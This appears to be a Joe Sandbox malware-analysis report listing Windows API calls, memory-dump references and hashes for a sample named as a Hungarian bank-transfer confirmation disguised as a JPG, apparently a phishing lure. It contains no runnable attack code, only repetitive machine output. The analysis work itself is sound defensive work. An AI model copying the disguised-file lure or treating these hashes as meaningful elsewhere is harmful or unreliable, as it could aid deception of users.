                                                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$InputSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 2221674350-0
                                                                                                          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$_wcscat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2037614760-0
                                                                                                          • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                                                          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                          • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                                                          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                          • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                          • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                          • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                          • String ID:
                                                                                                          • API String ID: 960795272-0
                                                                                                          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                          APIs
                                                                                                          • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4189319755-0
                                                                                                          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 1976402638-0
                                                                                                          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 642888154-0
                                                                                                          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$ClearErrorLast
                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                          • API String ID: 2487901850-572801152
                                                                                                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Enable$Show$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1871949834-0
                                                                                                          • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                          • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                          • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                          • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                          APIs
                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                          • SendMessageW.USER32 ref: 00471AE3
                                                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                          • String ID:
                                                                                                          • API String ID: 3611059338-0
                                                                                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1640429340-0
                                                                                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • _wcslen.LIBCMT ref: 004438CD
                                                                                                          • _wcslen.LIBCMT ref: 004438E6
                                                                                                          • _wcstok.LIBCMT ref: 004438F8
                                                                                                          • _wcslen.LIBCMT ref: 0044390C
                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                          • _wcstok.LIBCMT ref: 00443931
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3632110297-0
                                                                                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 752480666-0
                                                                                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3275902921-0
                                                                                                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
